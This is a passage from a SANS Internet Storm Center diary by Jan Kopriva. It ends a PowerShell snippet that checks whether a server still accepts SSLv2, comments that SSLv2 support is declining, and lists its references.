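    "Server negotiated: $($ssl.SslProtocol)"
}
catch {
    "SSLv2 handshake failed: $($_.Exception.Message)"
}
finally {
    $ssl.Dispose()
    $client.Close()
}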

So, although it is unlikely that we will ever get completely rid of SSLv2 (just like in the case of the Conficker worm[4]), it is good to see that the number and percentage of web servers that support it is decreasing at a fairly reasonable rate. Hopefully, it will continue to fall the same way in the future…

[1] https://en.wikipedia.org/wiki/Transport_Layer_Security#History_and_development
[2] https://isc.sans.edu/forums/diary/Internet+banking+sites+and+their+use+of+TLS+and+SSLv3+and+SSLv2/25606/
[3] https://www.ssllabs.com/ssl-pulse/
[4] https://ics-cert.kaspersky.com/publications/reports/2022/09/08/threat-landscape-for-industrial-automation-systems-statistics-for-h1-2022/

———–
Jan Kopriva
@jk0pr
Nettles Consulting

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.